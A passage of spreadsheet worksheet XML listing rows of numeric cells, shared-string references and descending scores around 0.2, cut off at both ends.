        <v>10480</v>
      </c>
      <c r="F10980" s="2">
        <v>0.2398030942334739</v>
      </c>
    </row>
    <row r="10981" ht="15.75" customHeight="1">
      <c r="A10981" s="1">
        <v>9140.0</v>
      </c>
      <c r="B10981" s="2">
        <v>5.5246744E7</v>
      </c>
      <c r="C10981" s="2" t="s">
        <v>10523</v>
      </c>
      <c r="D10981" s="2">
        <v>1.0</v>
      </c>
      <c r="E10981" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10981" s="2">
        <v>0.2392592592592593</v>
      </c>
    </row>
    <row r="10982" ht="15.75" customHeight="1">
      <c r="A10982" s="1">
        <v>5912.0</v>
      </c>
      <c r="B10982" s="2">
        <v>4.7202668E7</v>
      </c>
      <c r="C10982" s="2" t="s">
        <v>10524</v>
      </c>
      <c r="D10982" s="2">
        <v>1.0</v>
      </c>
      <c r="E10982" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10982" s="2">
        <v>0.2361111111111111</v>
      </c>
    </row>
    <row r="10983" ht="15.75" customHeight="1">
      <c r="A10983" s="1">
        <v>4480.0</v>
      </c>
      <c r="B10983" s="2">
        <v>4.2502922E7</v>
      </c>
      <c r="C10983" s="2" t="s">
        <v>10525</v>
      </c>
      <c r="D10983" s="2">
        <v>1.0</v>
      </c>
      <c r="E10983" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10983" s="2">
        <v>0.2354497354497355</v>
      </c>
    </row>
    <row r="10984" ht="15.75" customHeight="1">
      <c r="A10984" s="1">
        <v>4620.0</v>
      </c>
      <c r="B10984" s="2">
        <v>4.2972327E7</v>
      </c>
      <c r="C10984" s="2" t="s">
        <v>10526</v>
      </c>
      <c r="D10984" s="2">
        <v>1.0</v>
      </c>
      <c r="E10984" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10984" s="2">
        <v>0.2342995169082126</v>
      </c>
    </row>
    <row r="10985" ht="15.75" customHeight="1">
      <c r="A10985" s="1">
        <v>9686.0</v>
      </c>
      <c r="B10985" s="2">
        <v>5.6344326E7</v>
      </c>
      <c r="C10985" s="2" t="s">
        <v>10527</v>
      </c>
      <c r="D10985" s="2">
        <v>1.0</v>
      </c>
      <c r="E10985" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10985" s="2">
        <v>0.2334834834834835</v>
      </c>
    </row>
    <row r="10986" ht="15.75" customHeight="1">
      <c r="A10986" s="1">
        <v>9467.0</v>
      </c>
      <c r="B10986" s="2">
        <v>5.585532E7</v>
      </c>
      <c r="C10986" s="2" t="s">
        <v>10528</v>
      </c>
      <c r="D10986" s="2">
        <v>1.0</v>
      </c>
      <c r="E10986" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10986" s="2">
        <v>0.2333333333333333</v>
      </c>
    </row>
    <row r="10987" ht="15.75" customHeight="1">
      <c r="A10987" s="1">
        <v>16435.0</v>
      </c>
      <c r="B10987" s="2">
        <v>4.6343139E7</v>
      </c>
      <c r="C10987" s="2" t="s">
        <v>10529</v>
      </c>
      <c r="D10987" s="2">
        <v>1.0</v>
      </c>
      <c r="E10987" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10987" s="2">
        <v>0.2314814814814815</v>
      </c>
    </row>
    <row r="10988" ht="15.75" customHeight="1">
      <c r="A10988" s="1">
        <v>10113.0</v>
      </c>
      <c r="B10988" s="2">
        <v>5.724535E7</v>
      </c>
      <c r="C10988" s="2" t="s">
        <v>10530</v>
      </c>
      <c r="D10988" s="2">
        <v>1.0</v>
      </c>
      <c r="E10988" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10988" s="2">
        <v>0.2304804804804805</v>
      </c>
    </row>
    <row r="10989" ht="15.75" customHeight="1">
      <c r="A10989" s="1">
        <v>7399.0</v>
      </c>
      <c r="B10989" s="2">
        <v>5.1104232E7</v>
      </c>
      <c r="C10989" s="2" t="s">
        <v>10531</v>
      </c>
      <c r="D10989" s="2">
        <v>1.0</v>
      </c>
      <c r="E10989" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10989" s="2">
        <v>0.2301587301587303</v>
      </c>
    </row>
    <row r="10990" ht="15.75" customHeight="1">
      <c r="A10990" s="1">
        <v>17662.0</v>
      </c>
      <c r="B10990" s="2">
        <v>5.0441437E7</v>
      </c>
      <c r="C10990" s="2" t="s">
        <v>10532</v>
      </c>
      <c r="D10990" s="2">
        <v>1.0</v>
      </c>
      <c r="E10990" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10990" s="2">
        <v>0.2290715372907154</v>
      </c>
    </row>
    <row r="10991" ht="15.75" customHeight="1">
      <c r="A10991" s="1">
        <v>18377.0</v>
      </c>
      <c r="B10991" s="2">
        <v>5.2577789E7</v>
      </c>
      <c r="C10991" s="2" t="s">
        <v>10533</v>
      </c>
      <c r="D10991" s="2">
        <v>1.0</v>
      </c>
      <c r="E10991" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10991" s="2">
        <v>0.228494623655914</v>
      </c>
    </row>
    <row r="10992" ht="15.75" customHeight="1">
      <c r="A10992" s="1">
        <v>14631.0</v>
      </c>
      <c r="B10992" s="2">
        <v>4.0305905E7</v>
      </c>
      <c r="C10992" s="2" t="s">
        <v>10534</v>
      </c>
      <c r="D10992" s="2">
        <v>1.0</v>
      </c>
      <c r="E10992" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10992" s="2">
        <v>0.2281144781144781</v>
      </c>
    </row>
    <row r="10993" ht="15.75" customHeight="1">
      <c r="A10993" s="1">
        <v>14150.0</v>
      </c>
      <c r="B10993" s="2">
        <v>3.798018E7</v>
      </c>
      <c r="C10993" s="2" t="s">
        <v>10535</v>
      </c>
      <c r="D10993" s="2">
        <v>1.0</v>
      </c>
      <c r="E10993" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10993" s="2">
        <v>0.2263681592039801</v>
      </c>
    </row>
    <row r="10994" ht="15.75" customHeight="1">
      <c r="A10994" s="1">
        <v>17902.0</v>
      </c>
      <c r="B10994" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C10994" s="2" t="s">
        <v>10536</v>
      </c>
      <c r="D10994" s="2">
        <v>1.0</v>
      </c>
      <c r="E10994" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10994" s="2">
        <v>0.224910394265233</v>
      </c>
    </row>
    <row r="10995" ht="15.75" customHeight="1">
      <c r="A10995" s="1">
        <v>18449.0</v>
      </c>
      <c r="B10995" s="2">
        <v>5.2786432E7</v>
      </c>
      <c r="C10995" s="2" t="s">
        <v>10537</v>
      </c>
      <c r="D10995" s="2">
        <v>1.0</v>
      </c>
      <c r="E10995" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10995" s="2">
        <v>0.2248677248677249</v>
      </c>
    </row>
    <row r="10996" ht="15.75" customHeight="1">
      <c r="A10996" s="1">
        <v>18464.0</v>
      </c>
      <c r="B10996" s="2">
        <v>5.2836329E7</v>
      </c>
      <c r="C10996" s="2" t="s">
        <v>10538</v>
      </c>
      <c r="D10996" s="2">
        <v>1.0</v>
      </c>
      <c r="E10996" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10996" s="2">
        <v>0.2245370370370371</v>
      </c>
    </row>
    <row r="10997" ht="15.75" customHeight="1">
      <c r="A10997" s="1">
        <v>31979.0</v>
      </c>
      <c r="B10997" s="2">
        <v>5319104.0</v>
      </c>
      <c r="C10997" s="2" t="s">
        <v>10539</v>
      </c>
      <c r="D10997" s="2">
        <v>1.0</v>
      </c>
      <c r="E10997" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10997" s="2">
        <v>0.224537037037037</v>
      </c>
    </row>
    <row r="10998" ht="15.75" customHeight="1">
      <c r="A10998" s="1">
        <v>13759.0</v>
      </c>
      <c r="B10998" s="2">
        <v>3.6506028E7</v>
      </c>
      <c r="C10998" s="2" t="s">
        <v>10540</v>
      </c>
      <c r="D10998" s="2">
        <v>1.0</v>
      </c>
      <c r="E10998" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10998" s="2">
        <v>0.2230769230769231</v>
      </c>
    </row>
    <row r="10999" ht="15.75" customHeight="1">
      <c r="A10999" s="1">
        <v>13311.0</v>
      </c>
      <c r="B10999" s="2">
        <v>3.4539809E7</v>
      </c>
      <c r="C10999" s="2" t="s">
        <v>10541</v>
      </c>
      <c r="D10999" s="2">
        <v>1.0</v>
      </c>
      <c r="E10999" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F10999" s="2">
        <v>0.2228260869565217</v>
      </c>
    </row>
    <row r="11000" ht="15.75" customHeight="1">
      <c r="A11000" s="1">
        <v>9083.0</v>
      </c>
      <c r="B11000" s="2">
        <v>5.5122354E7</v>
      </c>
      <c r="C11000" s="2" t="s">
        <v>10542</v>
      </c>
      <c r="D11000" s="2">
        <v>1.0</v>
      </c>
      <c r="E11000" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11000" s="2">
        <v>0.2218915343915343</v>
      </c>
    </row>
    <row r="11001" ht="15.75" customHeight="1">
      <c r="A11001" s="1">
        <v>31131.0</v>
      </c>
      <c r="B11001" s="2">
        <v>4889467.0</v>
      </c>
      <c r="C11001" s="2" t="s">
        <v>10543</v>
      </c>
      <c r="D11001" s="2">
        <v>1.0</v>
      </c>
      <c r="E11001" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11001" s="2">
        <v>0.2215007215007215</v>
      </c>
    </row>
    <row r="11002" ht="15.75" customHeight="1">
      <c r="A11002" s="1">
        <v>19467.0</v>
      </c>
      <c r="B11002" s="2">
        <v>5.5778279E7</v>
      </c>
      <c r="C11002" s="2" t="s">
        <v>10544</v>
      </c>
      <c r="D11002" s="2">
        <v>1.0</v>
      </c>
      <c r="E11002" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11002" s="2">
        <v>0.2214912280701754</v>
      </c>
    </row>
    <row r="11003" ht="15.75" customHeight="1">
      <c r="A11003" s="1">
        <v>14269.0</v>
      </c>
      <c r="B11003" s="2">
        <v>3.8410408E7</v>
      </c>
      <c r="C11003" s="2" t="s">
        <v>10545</v>
      </c>
      <c r="D11003" s="2">
        <v>1.0</v>
      </c>
      <c r="E11003" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11003" s="2">
        <v>0.2213403880070547</v>
      </c>
    </row>
    <row r="11004" ht="15.75" customHeight="1">
      <c r="A11004" s="1">
        <v>6962.0</v>
      </c>
      <c r="B11004" s="2">
        <v>4.9979785E7</v>
      </c>
      <c r="C11004" s="2" t="s">
        <v>10546</v>
      </c>
      <c r="D11004" s="2">
        <v>1.0</v>
      </c>
      <c r="E11004" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11004" s="2">
        <v>0.220189701897019</v>
      </c>
    </row>
    <row r="11005" ht="15.75" customHeight="1">
      <c r="A11005" s="1">
        <v>10093.0</v>
      </c>
      <c r="B11005" s="2">
        <v>5.7187876E7</v>
      </c>
      <c r="C11005" s="2" t="s">
        <v>10547</v>
      </c>
      <c r="D11005" s="2">
        <v>1.0</v>
      </c>
      <c r="E11005" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11005" s="2">
        <v>0.220189701897019</v>
      </c>
    </row>
    <row r="11006" ht="15.75" customHeight="1">
      <c r="A11006" s="1">
        <v>17354.0</v>
      </c>
      <c r="B11006" s="2">
        <v>4.9434329E7</v>
      </c>
      <c r="C11006" s="2" t="s">
        <v>10548</v>
      </c>
      <c r="D11006" s="2">
        <v>1.0</v>
      </c>
      <c r="E11006" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11006" s="2">
        <v>0.2181964573268921</v>
      </c>
    </row>
    <row r="11007" ht="15.75" customHeight="1">
      <c r="A11007" s="1">
        <v>9538.0</v>
      </c>
      <c r="B11007" s="2">
        <v>5.6016712E7</v>
      </c>
      <c r="C11007" s="2" t="s">
        <v>10549</v>
      </c>
      <c r="D11007" s="2">
        <v>1.0</v>
      </c>
      <c r="E11007" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11007" s="2">
        <v>0.217948717948718</v>
      </c>
    </row>
    <row r="11008" ht="15.75" customHeight="1">
      <c r="A11008" s="1">
        <v>10273.0</v>
      </c>
      <c r="B11008" s="2">
        <v>5.7623868E7</v>
      </c>
      <c r="C11008" s="2" t="s">
        <v>10550</v>
      </c>
      <c r="D11008" s="2">
        <v>1.0</v>
      </c>
      <c r="E11008" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11008" s="2">
        <v>0.217948717948718</v>
      </c>
    </row>
    <row r="11009" ht="15.75" customHeight="1">
      <c r="A11009" s="1">
        <v>15951.0</v>
      </c>
      <c r="B11009" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C11009" s="2" t="s">
        <v>10551</v>
      </c>
      <c r="D11009" s="2">
        <v>1.0</v>
      </c>
      <c r="E11009" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11009" s="2">
        <v>0.2172364672364672</v>
      </c>
    </row>
    <row r="11010" ht="15.75" customHeight="1">
      <c r="A11010" s="1">
        <v>7402.0</v>
      </c>
      <c r="B11010" s="2">
        <v>5.1104232E7</v>
      </c>
      <c r="C11010" s="2" t="s">
        <v>10552</v>
      </c>
      <c r="D11010" s="2">
        <v>1.0</v>
      </c>
      <c r="E11010" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11010" s="2">
        <v>0.2162393162393163</v>
      </c>
    </row>
    <row r="11011" ht="15.75" customHeight="1">
      <c r="A11011" s="1">
        <v>16472.0</v>
      </c>
      <c r="B11011" s="2">
        <v>4.6499189E7</v>
      </c>
      <c r="C11011" s="2" t="s">
        <v>10553</v>
      </c>
      <c r="D11011" s="2">
        <v>1.0</v>
      </c>
      <c r="E11011" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11011" s="2">
        <v>0.2162393162393163</v>
      </c>
    </row>
    <row r="11012" ht="15.75" customHeight="1">
      <c r="A11012" s="1">
        <v>15772.0</v>
      </c>
      <c r="B11012" s="2">
        <v>4.4184276E7</v>
      </c>
      <c r="C11012" s="2" t="s">
        <v>10554</v>
      </c>
      <c r="D11012" s="2">
        <v>1.0</v>
      </c>
      <c r="E11012" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11012" s="2">
        <v>0.2151799687010955</v>
      </c>
    </row>
    <row r="11013" ht="15.75" customHeight="1">
      <c r="A11013" s="1">
        <v>19919.0</v>
      </c>
      <c r="B11013" s="2">
        <v>5.7413512E7</v>
      </c>
      <c r="C11013" s="2" t="s">
        <v>10555</v>
      </c>
      <c r="D11013" s="2">
        <v>1.0</v>
      </c>
      <c r="E11013" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11013" s="2">
        <v>0.2140151515151515</v>
      </c>
    </row>
    <row r="11014" ht="15.75" customHeight="1">
      <c r="A11014" s="1">
        <v>15042.0</v>
      </c>
      <c r="B11014" s="2">
        <v>4.1596213E7</v>
      </c>
      <c r="C11014" s="2" t="s">
        <v>10556</v>
      </c>
      <c r="D11014" s="2">
        <v>1.0</v>
      </c>
      <c r="E11014" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11014" s="2">
        <v>0.2134146341463415</v>
      </c>
    </row>
    <row r="11015" ht="15.75" customHeight="1">
      <c r="A11015" s="1">
        <v>4164.0</v>
      </c>
      <c r="B11015" s="2">
        <v>4.152389E7</v>
      </c>
      <c r="C11015" s="2" t="s">
        <v>10557</v>
      </c>
      <c r="D11015" s="2">
        <v>1.0</v>
      </c>
      <c r="E11015" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11015" s="2">
        <v>0.2118437118437118</v>
      </c>
    </row>
    <row r="11016" ht="15.75" customHeight="1">
      <c r="A11016" s="1">
        <v>18341.0</v>
      </c>
      <c r="B11016" s="2">
        <v>5.2440151E7</v>
      </c>
      <c r="C11016" s="2" t="s">
        <v>10558</v>
      </c>
      <c r="D11016" s="2">
        <v>1.0</v>
      </c>
      <c r="E11016" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11016" s="2">
        <v>0.2116666666666667</v>
      </c>
    </row>
    <row r="11017" ht="15.75" customHeight="1">
      <c r="A11017" s="1">
        <v>18198.0</v>
      </c>
      <c r="B11017" s="2">
        <v>5.2035839E7</v>
      </c>
      <c r="C11017" s="2" t="s">
        <v>10559</v>
      </c>
      <c r="D11017" s="2">
        <v>1.0</v>
      </c>
      <c r="E11017" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11017" s="2">
        <v>0.2115384615384615</v>
      </c>
    </row>
    <row r="11018" ht="15.75" customHeight="1">
      <c r="A11018" s="1">
        <v>15193.0</v>
      </c>
      <c r="B11018" s="2">
        <v>4.2053639E7</v>
      </c>
      <c r="C11018" s="2" t="s">
        <v>10560</v>
      </c>
      <c r="D11018" s="2">
        <v>1.0</v>
      </c>
      <c r="E11018" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11018" s="2">
        <v>0.2114427860696518</v>
      </c>
    </row>
    <row r="11019" ht="15.75" customHeight="1">
      <c r="A11019" s="1">
        <v>18142.0</v>
      </c>
      <c r="B11019" s="2">
        <v>5.1834194E7</v>
      </c>
      <c r="C11019" s="2" t="s">
        <v>10561</v>
      </c>
      <c r="D11019" s="2">
        <v>1.0</v>
      </c>
      <c r="E11019" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11019" s="2">
        <v>0.2114427860696518</v>
      </c>
    </row>
    <row r="11020" ht="15.75" customHeight="1">
      <c r="A11020" s="1">
        <v>4148.0</v>
      </c>
      <c r="B11020" s="2">
        <v>4.1420065E7</v>
      </c>
      <c r="C11020" s="2" t="s">
        <v>10562</v>
      </c>
      <c r="D11020" s="2">
        <v>1.0</v>
      </c>
      <c r="E11020" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11020" s="2">
        <v>0.2112794612794613</v>
      </c>
    </row>
    <row r="11021" ht="15.75" customHeight="1">
      <c r="A11021" s="1">
        <v>28633.0</v>
      </c>
      <c r="B11021" s="2">
        <v>2.7267903E7</v>
      </c>
      <c r="C11021" s="2" t="s">
        <v>10563</v>
      </c>
      <c r="D11021" s="2">
        <v>1.0</v>
      </c>
      <c r="E11021" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11021" s="2">
        <v>0.2097844112769486</v>
      </c>
    </row>
    <row r="11022" ht="15.75" customHeight="1">
      <c r="A11022" s="1">
        <v>17892.0</v>
      </c>
      <c r="B11022" s="2">
        <v>5.1055811E7</v>
      </c>
      <c r="C11022" s="2" t="s">
        <v>10564</v>
      </c>
      <c r="D11022" s="2">
        <v>1.0</v>
      </c>
      <c r="E11022" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11022" s="2">
        <v>0.2083333333333334</v>
      </c>
    </row>
    <row r="11023" ht="15.75" customHeight="1">
      <c r="A11023" s="1">
        <v>15738.0</v>
      </c>
      <c r="B11023" s="2">
        <v>4.408737E7</v>
      </c>
      <c r="C11023" s="2" t="s">
        <v>10565</v>
      </c>
      <c r="D11023" s="2">
        <v>1.0</v>
      </c>
      <c r="E11023" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11023" s="2">
        <v>0.2073552425665103</v>
      </c>
    </row>
    <row r="11024" ht="15.75" customHeight="1">
      <c r="A11024" s="1">
        <v>12966.0</v>
      </c>
      <c r="B11024" s="2">
        <v>3.2524817E7</v>
      </c>
      <c r="C11024" s="2" t="s">
        <v>10566</v>
      </c>
      <c r="D11024" s="2">
        <v>1.0</v>
      </c>
      <c r="E11024" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11024" s="2">
        <v>0.2068713450292398</v>
      </c>
    </row>
    <row r="11025" ht="15.75" customHeight="1">
      <c r="A11025" s="1">
        <v>16223.0</v>
      </c>
      <c r="B11025" s="2">
        <v>4.5711751E7</v>
      </c>
      <c r="C11025" s="2" t="s">
        <v>10567</v>
      </c>
      <c r="D11025" s="2">
        <v>1.0</v>
      </c>
      <c r="E11025" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11025" s="2">
        <v>0.2068273092369478</v>
      </c>
    </row>
    <row r="11026" ht="15.75" customHeight="1">
      <c r="A11026" s="1">
        <v>9466.0</v>
      </c>
      <c r="B11026" s="2">
        <v>5.585532E7</v>
      </c>
      <c r="C11026" s="2" t="s">
        <v>10568</v>
      </c>
      <c r="D11026" s="2">
        <v>1.0</v>
      </c>
      <c r="E11026" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11026" s="2">
        <v>0.2042181069958847</v>
      </c>
    </row>
    <row r="11027" ht="15.75" customHeight="1">
      <c r="A11027" s="1">
        <v>21858.0</v>
      </c>
      <c r="B11027" s="2">
        <v>2.7267904E7</v>
      </c>
      <c r="C11027" s="2" t="s">
        <v>10569</v>
      </c>
      <c r="D11027" s="2">
        <v>1.0</v>
      </c>
      <c r="E11027" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11027" s="2">
        <v>0.2039930555555556</v>
      </c>
    </row>
    <row r="11028" ht="15.75" customHeight="1">
      <c r="A11028" s="1">
        <v>25407.0</v>
      </c>
      <c r="B11028" s="2">
        <v>1.37706E7</v>
      </c>
      <c r="C11028" s="2" t="s">
        <v>10570</v>
      </c>
      <c r="D11028" s="2">
        <v>1.0</v>
      </c>
      <c r="E11028" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11028" s="2">
        <v>0.2034534534534535</v>
      </c>
    </row>
    <row r="11029" ht="15.75" customHeight="1">
      <c r="A11029" s="1">
        <v>18619.0</v>
      </c>
      <c r="B11029" s="2">
        <v>5.3337014E7</v>
      </c>
      <c r="C11029" s="2" t="s">
        <v>10571</v>
      </c>
      <c r="D11029" s="2">
        <v>1.0</v>
      </c>
      <c r="E11029" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11029" s="2">
        <v>0.2027777777777778</v>
      </c>
    </row>
    <row r="11030" ht="15.75" customHeight="1">
      <c r="A11030" s="1">
        <v>7161.0</v>
      </c>
      <c r="B11030" s="2">
        <v>5.0490972E7</v>
      </c>
      <c r="C11030" s="2" t="s">
        <v>10572</v>
      </c>
      <c r="D11030" s="2">
        <v>1.0</v>
      </c>
      <c r="E11030" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11030" s="2">
        <v>0.2025641025641026</v>
      </c>
    </row>
    <row r="11031" ht="15.75" customHeight="1">
      <c r="A11031" s="1">
        <v>31352.0</v>
      </c>
      <c r="B11031" s="2">
        <v>4985337.0</v>
      </c>
      <c r="C11031" s="2" t="s">
        <v>10573</v>
      </c>
      <c r="D11031" s="2">
        <v>1.0</v>
      </c>
      <c r="E11031" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11031" s="2">
        <v>0.2023809523809525</v>
      </c>
    </row>
    <row r="11032" ht="15.75" customHeight="1">
      <c r="A11032" s="1">
        <v>30832.0</v>
      </c>
      <c r="B11032" s="2">
        <v>4.5447413E7</v>
      </c>
      <c r="C11032" s="2" t="s">
        <v>10574</v>
      </c>
      <c r="D11032" s="2">
        <v>1.0</v>
      </c>
      <c r="E11032" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11032" s="2">
        <v>0.2023809523809524</v>
      </c>
    </row>
    <row r="11033" ht="15.75" customHeight="1">
      <c r="A11033" s="1">
        <v>16471.0</v>
      </c>
      <c r="B11033" s="2">
        <v>4.649911E7</v>
      </c>
      <c r="C11033" s="2" t="s">
        <v>10575</v>
      </c>
      <c r="D11033" s="2">
        <v>1.0</v>
      </c>
      <c r="E11033" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11033" s="2">
        <v>0.2022569444444445</v>
      </c>
    </row>
    <row r="11034" ht="15.75" customHeight="1">
      <c r="A11034" s="1">
        <v>28632.0</v>
      </c>
      <c r="B11034" s="2">
        <v>2.7267903E7</v>
      </c>
      <c r="C11034" s="2" t="s">
        <v>10569</v>
      </c>
      <c r="D11034" s="2">
        <v>1.0</v>
      </c>
      <c r="E11034" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11034" s="2">
        <v>0.2022569444444445</v>
      </c>
    </row>
    <row r="11035" ht="15.75" customHeight="1">
      <c r="A11035" s="1">
        <v>14681.0</v>
      </c>
      <c r="B11035" s="2">
        <v>4.0496559E7</v>
      </c>
      <c r="C11035" s="2" t="s">
        <v>10576</v>
      </c>
      <c r="D11035" s="2">
        <v>1.0</v>
      </c>
      <c r="E11035" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11035" s="2">
        <v>0.2018284106891703</v>
      </c>
    </row>
    <row r="11036" ht="15.75" customHeight="1">
      <c r="A11036" s="1">
        <v>15831.0</v>
      </c>
      <c r="B11036" s="2">
        <v>4.4318804E7</v>
      </c>
      <c r="C11036" s="2" t="s">
        <v>10577</v>
      </c>
      <c r="D11036" s="2">
        <v>1.0</v>
      </c>
      <c r="E11036" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11036" s="2">
        <v>0.2016742770167428</v>
      </c>
    </row>
    <row r="11037" ht="15.75" customHeight="1">
      <c r="A11037" s="1">
        <v>18069.0</v>
      </c>
      <c r="B11037" s="2">
        <v>5.1609487E7</v>
      </c>
      <c r="C11037" s="2" t="s">
        <v>10578</v>
      </c>
      <c r="D11037" s="2">
        <v>1.0</v>
      </c>
      <c r="E11037" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11037" s="2">
        <v>0.2008547008547009</v>
      </c>
    </row>
    <row r="11038" ht="15.75" customHeight="1">
      <c r="A11038" s="1">
        <v>10144.0</v>
      </c>
      <c r="B11038" s="2">
        <v>5.7307419E7</v>
      </c>
      <c r="C11038" s="2" t="s">
        <v>10579</v>
      </c>
      <c r="D11038" s="2">
        <v>1.0</v>
      </c>
      <c r="E11038" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11038" s="2">
        <v>0.2006535947712418</v>
      </c>
    </row>
    <row r="11039" ht="15.75" customHeight="1">
      <c r="A11039" s="1">
        <v>33127.0</v>
      </c>
      <c r="B11039" s="2">
        <v>7020050.0</v>
      </c>
      <c r="C11039" s="2" t="s">
        <v>10580</v>
      </c>
      <c r="D11039" s="2">
        <v>1.0</v>
      </c>
      <c r="E11039" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11039" s="2">
        <v>0.2004830917874396</v>
      </c>
    </row>
    <row r="11040" ht="15.75" customHeight="1">
      <c r="A11040" s="1">
        <v>17134.0</v>
      </c>
      <c r="B11040" s="2">
        <v>4.8829547E7</v>
      </c>
      <c r="C11040" s="2" t="s">
        <v>10581</v>
      </c>
      <c r="D11040" s="2">
        <v>1.0</v>
      </c>
      <c r="E11040" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11040" s="2">
        <v>0.2004219409282701</v>
      </c>
    </row>
    <row r="11041" ht="15.75" customHeight="1">
      <c r="A11041" s="1">
        <v>1117.0</v>
      </c>
      <c r="B11041" s="2">
        <v>2.4091084E7</v>
      </c>
      <c r="C11041" s="2" t="s">
        <v>10582</v>
      </c>
      <c r="D11041" s="2">
        <v>1.0</v>
      </c>
      <c r="E11041" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11041" s="2">
        <v>0.2001633986928105</v>
      </c>
    </row>
    <row r="11042" ht="15.75" customHeight="1">
      <c r="A11042" s="1">
        <v>15874.0</v>
      </c>
      <c r="B11042" s="2">
        <v>4.4503531E7</v>
      </c>
      <c r="C11042" s="2" t="s">
        <v>10583</v>
      </c>
      <c r="D11042" s="2">
        <v>1.0</v>
      </c>
      <c r="E11042" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11042" s="2">
        <v>0.2001262626262626</v>
      </c>
    </row>
    <row r="11043" ht="15.75" customHeight="1">
      <c r="A11043" s="1">
        <v>8887.0</v>
      </c>
      <c r="B11043" s="2">
        <v>5.4783401E7</v>
      </c>
      <c r="C11043" s="2" t="s">
        <v>10584</v>
      </c>
      <c r="D11043" s="2">
        <v>1.0</v>
      </c>
      <c r="E11043" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11043" s="2">
        <v>0.1994535519125683</v>
      </c>
    </row>
    <row r="11044" ht="15.75" customHeight="1">
      <c r="A11044" s="1">
        <v>19690.0</v>
      </c>
      <c r="B11044" s="2">
        <v>5.6470143E7</v>
      </c>
      <c r="C11044" s="2" t="s">
        <v>10585</v>
      </c>
      <c r="D11044" s="2">
        <v>1.0</v>
      </c>
      <c r="E11044" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11044" s="2">
        <v>0.1994535519125683</v>
      </c>
    </row>
    <row r="11045" ht="15.75" customHeight="1">
      <c r="A11045" s="1">
        <v>6624.0</v>
      </c>
      <c r="B11045" s="2">
        <v>4.9056012E7</v>
      </c>
      <c r="C11045" s="2" t="s">
        <v>10586</v>
      </c>
      <c r="D11045" s="2">
        <v>1.0</v>
      </c>
      <c r="E11045" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11045" s="2">
        <v>0.1994152046783626</v>
      </c>
    </row>
    <row r="11046" ht="15.75" customHeight="1">
      <c r="A11046" s="1">
        <v>9077.0</v>
      </c>
      <c r="B11046" s="2">
        <v>5.5122354E7</v>
      </c>
      <c r="C11046" s="2" t="s">
        <v>10587</v>
      </c>
      <c r="D11046" s="2">
        <v>1.0</v>
      </c>
      <c r="E11046" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11046" s="2">
        <v>0.1992063492063493</v>
      </c>
    </row>
    <row r="11047" ht="15.75" customHeight="1">
      <c r="A11047" s="1">
        <v>31129.0</v>
      </c>
      <c r="B11047" s="2">
        <v>4889467.0</v>
      </c>
      <c r="C11047" s="2" t="s">
        <v>10588</v>
      </c>
      <c r="D11047" s="2">
        <v>1.0</v>
      </c>
      <c r="E11047" s="3" t="s">
        <v>10480</v>
      </c>
